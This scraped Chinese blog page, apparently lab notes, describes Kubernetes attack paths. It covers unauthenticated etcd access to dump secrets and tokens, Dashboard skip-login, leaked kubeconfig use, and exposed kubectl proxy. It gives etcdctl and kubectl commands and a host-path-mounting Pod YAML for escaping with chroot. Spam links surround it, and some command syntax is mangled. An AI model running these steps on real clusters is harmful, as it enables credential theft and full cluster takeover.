当前位置: 首页 > news >正文

做app的网站有哪些泰安网页设计公司

做app的网站有哪些,泰安网页设计公司,建设银行的投诉网站,大公司的网站都找谁设计目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点#xff1a; 1、云原生-K8s安全-etcd未…目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点 1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置 云原生-K8s安全-etcd(Master-数据库)未授权访问 实战中不会常见利用条件比较苛刻。 默认通过证书认证起一个数据库作用。主要存放节点的数据如一些token和证书。 攻击23791端口 配置映射 /etc/kubernetes/manifests/etcd.yaml第一种(满足)在安装etcd时没有配置指定--client-cert-auth 参数打开证书校验暴露在外Etcd服务存在未授权访问风险。暴露外部可以访问直接未授权访问获取secrets和token利用 重启kubelet进程 systemctl restart kubelet第二种在打开证书校验选项后通过本地127.0.0.1:2379可免认证访问Etcd服务但通过其他地址访问要携带cert(证书)进行认证访问一般配合ssrf或其他利用较为鸡肋。只能本地访问直接未授权访问获取secrets和token利用 第三种(满足)实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1)如果访问没设置0.0.0.0暴露那么也就意味着最多就是本地访问不能公网访问只能配合ssrf或其他。只能本地访问利用ssrf或其他进行获取secrets和token利用 复现搭建 https://www.cnblogs.com/qtzd/p/k8s_etcd.html 复现利用etcdV2/V3版本利用参考 https://www.cnblogs.com/qtzd/p/k8s_etcd.html https://www.wangan.com/p/7fy7f81f02d9563a 暴露etcd未授权-获取secretstoken-通过token访问API-Server接管 etcdV2版本利用 直接访问http://ip:2379/v2/keys/?recursivetrue 可以看到所有的key-value值。secrets token etcdV3版本利用 安装etcdctlhttps://github.com/etcd-io/etcd/releases 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 1、连接提交测试 ./etcdctl --endpoints192.168.139.136:23791 get / --prefix./etcdctl --endpoints192.168.139.136:23791 put /testdir/testkey1 Hello world1./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey2 Hello world2 ./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey3 Hello world32、获取k8s的secrets ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/3、读取service account token ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole./etcdctl --endpoints192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z4、通过token访问API-Server获取集群的权限 kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --tokeney... -n kube-system get podsSSRF解决限制访问-获取secretstoken-通过token访问API-Server接管 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 默认端口8001(一般会被映射成别的端口) 配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。 kubernetes dashboard的未授权其实分两种情况 一种是在本身就存在着不需要登录的http接口但接口本身并不会暴露出来如接口被暴露在外就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦修改了配置文件使得安全接口https的dashboard页面可以跳过登录。 复现利用 前提条件 用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboardKubernetes-dashboard绑定cluster-admin拥有管理集群的最高权限) 1、安装 https://blog.csdn.net/justlpf/article/details/130718774 2、启动 kubectl create -f recommended.yaml 3、卸载 kubectl delete -f recommended.yaml4、查看状态 kubectl get pod,svc -n kubernetes-dashboard5、利用新增Pod后续同前面利用一致 apiVersion: v1 kind: Pod metadata:name: xiaodisec spec:containers:- image: nginxname: xiaodisecvolumeMounts:- mountPath: /mntname: test-volumevolumes:- name: test-volumehostPath:path: /找到暴露面板-dashboard跳过-创建或上传pod-进入pod执行-利用挂载逃逸   云原生-K8s安全-Configfile鉴权文件泄漏 攻击者通过Webshell、Github等拿到了K8s配置的Config文件操作集群从而接管所有容器。 K8s configfile作为K8s集群的管理凭证其中包含有关K8s集群的详细信息(API Server、登录凭证)。 如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等)就可以直接通过API Server接管K8s集群带来风险隐患。用户凭证保存 在kubeconfig文件中通过以下顺序来找到kubeconfig文件 如果提供了--kubeconfig参数就使用提供的kubeconfig文件如果没有提供--kubeconfig参数但设置了环境变量$KUBECONFIG则使用该环境变量提供的kubeconfig文件如果以上两种情况都没有kubectl就使用默认的kubeconfig文件~/.kube/config 复现利用K8s-configfile-创建Pod/挂载主机路径-Kubectl进入容器-利用挂载逃逸 1、将获取到的config复制 2、安装kubectl使用config连接 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 连接 kubectl -s https://192.168.139.130:6443/ --kubeconfigconfig --insecure-skip-tls-verifytrue get nodes3、上传利用test.yaml创建pod kubectl apply -f test.yaml -n default --kubeconfigconfig4、连接pod后进行容器挂载逃逸 kubectl exec -it xiaodisec bash -n default --kubeconfigconfigcd /mnt chroot . bash云原生-K8s安全-Kubectl Proxy不安全配置 当运维人员需要某个环境暴露端口或者IP时会用到Kubectl Proxy 使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上 环境搭建 kubectl --insecure-skip-tls-verify proxy --accept-hosts^.*$ --address0.0.0.0 --port8009 复现利用类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。 找到暴露入口点根据类型选择合适方案 kubectl -s http://192.168.139.130:8009 get pods -n kube-system
http://www.hkea.cn/news/14405651/

相关文章:

  • html网页设计网站网站建设优化方法
  • 阿里云需要网站建设方案书网站点内页还是首页
  • 建设免费网站登录网址抚州的电子商务网站建设公司
  • ps网站导航怎么做韩国今天新闻
  • 上海校园兼职网站建设网站布局优化
  • 徐州企业网站制作上海公司做网站的
  • 怎么建单位的网站雷锋书签制作图片
  • 网站开发技术的现状网站建设的企业
  • 做网站膜网站怎么做网站论坛源码
  • 上海装修网站建设乐清网站建设推广
  • 张掖网站建设培训建网站多少钱一平方
  • 免费网站建设解决方案网站建设工作建议
  • 做网站是不是需要服务器互联网营销与管理
  • 唐山房产网站建设考试培训
  • 国内精美网站界面网址惠州品牌网站建设价格
  • 网站建设要规避的分类目录采用的是
  • 西双网站建设百讯网站建设
  • php做网站用什么开发工具网站logo名词解释
  • 预订网站模板品牌建设的五个要素
  • 教育平台oss做视频网站重庆建筑人员证书查询
  • 网站如何做网页查询广州市手机网站建设公司
  • 网易网站开发淘宝客手机网站搭建
  • 有域名和主机怎么做网站网页qq音乐在线听
  • 网站开发开题报告范文邵阳市 网站建设
  • 按钮特效网站空包网站建设属于哪类
  • 建设建网站中国机械外协加工网
  • 上海网站设计合理柚v米科技博罗网站建设哪家便宜
  • 林州网站建设哪家便宜牡丹江营商环境建设监督局网站
  • 一个公司可以做几个网站东莞网络营销推广专业
  • 网站制作论文题目ai绘画软件免费